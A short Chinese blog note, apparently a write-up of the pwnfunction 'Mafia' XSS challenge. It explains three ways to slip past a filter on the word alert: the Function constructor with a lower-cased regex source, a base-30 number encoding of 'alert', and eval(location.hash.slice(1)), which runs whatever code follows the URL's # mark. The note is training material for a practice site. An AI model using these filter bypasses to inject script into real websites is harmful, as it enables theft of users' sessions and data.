这个是利用的构造函数 用source来获取构造函数的源码并转化成小写
Function(/ALERT(1337)/.source.toLowerCase())()或
parseInt(string, radix)
string:要被解析的字符串。radix:解析时使用的基数(进制)。可选参数,默认为10。
用parseint将alert转成进制
这里为什么用30因为在转换进制的时候是0-9其次才是a-z也就是说他在20位加上0-9正好是30
eval(8680439..toString(30))(1337)或
"location.hash" 是 JavaScript 中用来获取当前页面 URL 中的锚点(即 # 号后面的部分)的属性。通过访问 "location.hash",你可以获取当前页面 URL 中的锚点信息
"slice" 是 JavaScript 中用来提取字符串中指定部分的方法。
eval(location.hash.slice(1))
标签:xss,radix,hash,进制,30,location,Mafia,pwnfunction,构造函数 From: https://blog.csdn.net/weixin_63750160/article/details/137504260